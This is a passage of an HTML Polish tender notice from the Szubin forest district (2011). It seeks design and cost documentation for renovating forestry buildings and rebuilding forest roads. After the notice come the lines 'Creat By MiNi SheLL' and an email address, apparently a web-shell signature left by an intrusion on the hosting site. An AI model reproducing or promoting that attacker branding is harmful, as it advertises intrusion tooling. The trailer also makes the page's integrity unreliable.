a)	wystąpienia niekorzystnych warunków atmosferycznych uniemożliwiających wykonanie prac projektowych w terenie, np. wykonanie pomiarów, inwentaryzacji, itp,
b)	konieczności uzyskania dodatkowych decyzji administracyjnych, np. decyzja o ustaleniu warunków zagospodarowania terenu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_torun/nadl_szubin<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Szubin
Szubin Wieś 52, 89-200 Szubin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.11.2011 godzina 09:00, miejsce: Nadleśnictwo Szubin
Szubin Wieś 52, 89-200 Szubin
budynek A - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej modernizacji budynków mieszkalnych  i gospodarczych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Remont budynek mieszkalnego leśniczówki Laskownica, położony w m. Laskownica 25, 89-240 Kcynia,  pow. użytkowa 143,09 m2, murowany, 2-kondygnacyjny z poddaszem   nieużytkowym, kryty dachówką  położony Laskownica , 89-240 Kcynia. Ogólny zakres robót obejmuje:
-	termomodernizacja budynku, remont elewacji,
-	remont wejścia do piwnicy - wykonanie zadaszenia, poszerzenie otworu, montaż drzwi zewnętrznych, naprawa schodów, izolacja murków),
-	wykonanie zsypu do piwnicy, wykonanie nawiewu do kotłowni,
-	częściowa wymiana stolarki okiennej i okien piwnicznych,
-	montaż stopni, ławy kominiarskiej, drabinek śniegowych,
-	wymiana parapetów zewnętrznych,
-	konserwacja ogrodzenia drewnianego, uzupełnienie części ogrodzenia,
-	przebudowa studzienek kanalizacyjnych,
-	utwardzenie nawierzchni kostką brukową - parking, chodniki,
-	wykonanie okładzin schodów zewnętrznych,
-	adaptacja pomieszczenia na łazienkę na parterze,
-	wymiana instalacji c. o., (rury, grzejniki),
-	remont podłóg na parterze - rozbiórka podłóg z desek, wykonanie izolacji i posadzek betonowych, montaż paneli podłogowych, płytek ceramicznych,
-	remont łazienek na parterze i piętrze - wymiana okładzin ceramicznych, wymiana armatury sanitarnej,
-	wymiana wewnętrznej stolarki drzwiowej,
-	remont ścian i sufitów - rozbiórka okładzin z paneli, boazerii,  itp, wykonanie gładzi gipsowych, malowanie, 
-	adaptacja części poddasza na pokój (sucha zabudowa).
-	docieplenie dachu wełną mineralną,
-	uzupełnienie tynków wewnętrznych w piwnicy, malowanie,

2. Remont budynku gospodarczego położonego w m. Kąpie 24, 89-210 Łabiszyn, murowany z poddaszem, kryty eternitem,  pow. zabudowy 177,10m2 Ogólny zakres robót obejmuje:
-	wymiana pokrycia dachowego, rynien, obróbek blacharskich,
-	wymiana stolarki okiennej i drzwiowej,
-	remont oraz konserwacja więźby dachowej,
-	remont stropu drewnianego,
-	naprawa ścian zewnętrznych i wewnętrznych, remont elewacji,
-	wymiana instalacji elektrycznej,
-	remont posadzek betonowych, 
 
3. Wykonanie robót remontowych w siedzibie nadleśnictwa, położonych w m. Szubin wieś 52, 89-200 Szubin.  
3.1  Modernizacja budynku gospodarczego, murowanego, parterowego,  stropodach kryty papą, pow. zabudowy 157,24m2. Ogólny zakres robót obejmuje:
-	remont pokrycia dachowego poprzez ułożenie papy termozgrzewalnej, 
-	wymiana rynien, obróbek blacharskich,
-	remont elewacji - naprawa tynków, malowanie,
-	wymiana drzwi garażowych oraz stolarki okiennej,
-	przebudowa elektrycznej tablicy rozdzielczej,
-	wymiana instalacji elektrycznej i oświetleniowej, 
-	wymiana instalacji wod-kan.,
-	remont tynków wewnętrznych, malowanie,
3.2 Remont garażu 2-stanowiskowego, murowanego, krytego blachodachówką, pow. zabudowy 45,54 m2.
      Ogólny zakres robót obejmuje:
-	wymiana drzwi garażowych,
-	wymiana rynien,
-	naprawa tynków zewnętrznych i wewnętrznych,  malowanie  
3.3  Projekt utwardzenia nawierzchni kostką betonową - ok. 700m2 wraz z projektem odprowadzenia wód opadowych,
3.4 Projekt rozbiórki następujących budynków:
-	budynek gospodarczy wraz z przybudówką i wiatą , konstrukcji drewnianej, kryty papą (część główna) , oraz eternitem (przybudówka i wiata), pow. zabudowy 170,87m2,
-	budynek gospodarczy murowany, kryty eternitem, pow. zabudowy 32,95m2.-
4.  Modernizacja siedziby Leśnictwa Drogosław, położonej w m. Drogosław 1, 89-200 Szubin, 
4.1. Budynek mieszkalny - leśniczówka, murowany, z poddaszem użytkowym, kryty blachodachówką, pow.   użytkowa 153,70m2.  Ogólny zakres robót obejmuje:
-	wymiana wewnętrznej stolarki drzwiowej,
-	remont podłóg na parterze - rozbiórka podłóg z desek, wykonanie izolacji i posadzek betonowych, montaż paneli podłogowych, płytek ceramicznych,
-	wymiana instalacji c. o., (rury, grzejniki),
-	remont sufitów na parterze, wykonanie okładzin stropów z płyt GKB,
-	remont tynków wewnętrznych, wykonanie gładzi, malowanie,
-	wymiana płytek podłogowych w korytarzu,
-	remont drewnianych schodów wewnętrznych,
-	wymiana kabiny prysznicowej, 
-	częściowa wymiana wewnętrznej instalacji elektrycznej,
-	wymiana balustrad na tarasie,
-	konserwacja ogrodzenia drewnianego, uzupełnienie, wymiana bramy na rozsuwaną,
-	przebudowa studzienek kanalizacyjnych,
-	utwardzenie nawierzchni kostką brukową - parking, chodniki,
4.2 Remont budynku garażowego, murowanego, krytego papą, pow. zabudowy 51,99 m2. Ogólny zakres robót  obejmuje:  
-	wymiana wrót garażowych,
-	remont elewacji - uzupełnienie tynków, malowanie,
-	remont pokrycia dachowego poprzez pokrycie papą termozgrzewalną,
4.3 Remont budynku gospodarczego murowanego, z poddaszem użytkowym, krytego papą, pow. zabudowy           
88,81m2. Ogólny zakres robót obejmuje:
-	remont pokrycia dachowego poprzez pokrycie papą termozgrzewalną,
-	montaż rynien i rur spustowych, 
-	remont więźby dachowej - częściowa wymiana elementów, konserwacja,
-	wymiana stolarki okiennej i drzwiowej,
-	wymiana poszycia ścian zewnętrznych z desek na wysokości poddasza,
-	naprawa tynków zewnętrznych, malowanie,
4.4  Budowa wiaty na drewno, konstrukcji drewnianej, na płycie betonowej, krytej blachodachówką, pow.   użytkowa ok. 25-30m2.
4.4 Rozbiórki następujących budynków gospodarczych: 
-	stodoła konstrukcji drewnianej, kryta eternitem, pow. zabudowy 95,03m2,
-	magazyn konstrukcji murowanej, kryty papą, pow. zabudowy 39,21m2,
-	stodoła konstrukcji drewnianej, kryta eternitem, pow. zabudowy 70,40m2,
-	szopa drewniana, kryta papą, pow. zabudowy 28,50m2.
Podane  zakresy  zawierają ogólny rozmiar planowanych robót remontowych wg zamierzeń i wiedzy Zamawiającego. Zamawiający zastrzega możliwość dokonania zmian w podanych zakresach w trakcie opracowania dokumentacji. 

Wymagany zakres dokumentacji dla części 1 zamówienia:
-	projekty budowlano-wykonawcze w 4 egz. na powyższe zadania, opracowane we wszystkich niezbędnych branżach,
-	wykonanie specyfikacji technicznych wykonania i odbioru robót budowlanych w 2 egz. we wszystkich branżach,
-	opracowanie dokumentacji dotyczącej bezpieczeństwa i ochrony zdrowia,
-	wykonanie kosztorysów inwestorskich i przedmiarów robót,
-	uzyskanie wszelkich wymaganych przepisami niezbędnych uzgodnień i opinii dokumentacji,
-	uzgadnianie z zamawiającym rozwiązań projektowych,
-	uzyskanie prawomocnych decyzji o pozwoleniu na budowę, lub zgłoszenie wykonania robót,
-	przygotowanie wszelkich opracowań również w formie elektronicznej (format PDF.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.22.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie dokumentacji projektowej  remontów dróg leśnych:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Droga pożarowa nr 24 i 25 w Leśnictwie Pszczółczyn, gmina Łabiszyn,  dł. łącznie 3,1km, szerokość jezdni 3,5m. Nawierzchnia drogi z  pozostałościami nawierzchni bitumicznej na podbudowie z kruszywa wapiennego, pobocza gruntowe, rowy chłonne. Ogólny zakres robót obejmuje:
-	remont nawierzchni tłuczniowej, uzupełnienie ubytków, wyprofilowanie.
-	powierzchniowe utrwalenie gresami i emulsją asfaltową,
-	odtworzenie poboczy gruntowych oraz rowów chłonnych,
-	zaprojektowanie mijanek oraz zjazdów na skrzyżowaniach
2.  Droga pożarowa nr 70 w Leśnictwach Ustronie i Studzienki, gmina Szubin,  dł. 9,30km. Na odcinku 6,2 km nawierzchnia z kruszywa wapiennego,  na odcinku 3,1km nawierzchnia z pozostałości masy bitumicznej na podbudowie z kruszywa wapiennego. Szerokość jezdni 3,5m, pobocza gruntowe, odcinkowo rowy chłonne. Ogólny zakres robót obejmuje:
-	remont nawierzchni tłuczniowej, uzupełnienie ubytków, wyprofilowanie,
-	 powierzchniowe utrwalenie gresami i emulsją asfaltową,
-	odtworzenie poboczy gruntowych oraz rowów chłonnych,
-	zaprojektowanie mijanek oraz zjazdów utwardzonych  na skrzyżowaniach

3. Droga wywozowa w Leśnictwie Wieszki, gmina Szubin, dł.  3,0km. Droga o nawierzchni gruntowej, rowów brak, szerokość jezdni 3,5m. Ogólny zakres robót obejmuje:
-	karczowanie pni drzew oraz krzewów znajdujących sie w pasie drogi,
-	wykonanie oraz wyprofilowanie i zagęszczenie koryta,
-	wykonanie nawierzchni nieulepszonej z kruszywa,
-	wykonanie poboczy gruntowych,
-	wykonanie zjazdów utwardzonych na skrzyżowaniach.
4.  Droga wywozowa w Leśnictwie Glinki, gmina Sadki, dł.  1,47 km. Droga o nawierzchni gruntowej,  rowów brak, szerokość jezdni 3,5m. Ogólny zakres robót obejmuje:
-	karczowanie pni drzew oraz krzewów znajdujących sie w pasie drogi,
-	odcinkowo poszerzenie drogi biegnącej w wykopie, 
-	wykonanie oraz wyprofilowanie i zagęszczenie koryta,
-	wykonanie nawierzchni nieulepszonej z kruszywa,
-	wykonanie poboczy gruntowych,
-	wykonanie zjazdów utwardzonych na skrzyżowaniach.

5. Droga pożarowa nr 6 w Leśnictwach Jaktórka i Kowalewo, gmina Szubin,  dł. 2,64 km. Droga o nawierzchni gruntowej,  rowów brak, szerokość jezdni 3,5m. Ogólny zakres robót obejmuje:
-	karczowanie pni drzew oraz krzewów znajdujących sie w pasie drogi,
-	odcinkowo poszerzenie drogi biegnącej w wykopie, 
-	wykonanie oraz wyprofilowanie i zagęszczenie koryta,
-	wykonanie nawierzchni nieulepszonej z kruszywa,
-	wykonanie poboczy gruntowych,
-	wykonanie mijanek oraz  zjazdów utwardzonych na skrzyżowaniach.
6. Droga pożarowa nr 10 w Leśnictwach Gąbin i Łabiszyn , gmina Łabiszyn, dł. 5,177 km. Droga o nawierzchni wykonanej z kruszywa wapiennego, po remoncie w 2011r, szerokość jezdni 3,50m. Ogolny zakres robót obejmuje:
-	przygotowanie istniejącej nawierzchni z kruszywa wapiennego oraz powierzchniowe utrwalenie gresami i emulsją asfaltową

Podane  zakresy  zawierają ogólny rozmiar planowanych robót remontowych wg zamierzeń i wiedzy Zamawiającego. Zamawiający zastrzega możliwość dokonania zmian w podanych zakresach w trakcie opracowania dokumentacji. 

Wymagany zakres dokumentacji dla części 2 zamówienia:
-	projekty budowlano-wykonawcze w 4 egz. na powyższe zadania, opracowane we wszystkich niezbędnych branżach,
-	wykonanie specyfikacji technicznych wykonania i odbioru robót budowlanych w 2 egz. we wszystkich branżach,
-	wykonanie kosztorysów inwestorskich i przedmiarów robót,
-	uzyskanie wszelkich wymaganych przepisami niezbędnych uzgodnień i opinii dokumentacji,
-	uzgadnianie z zamawiającym rozwiązań projektowych,
-	przygotowanie wszelkich opracowań również w formie elektronicznej (format PDF)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.22.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com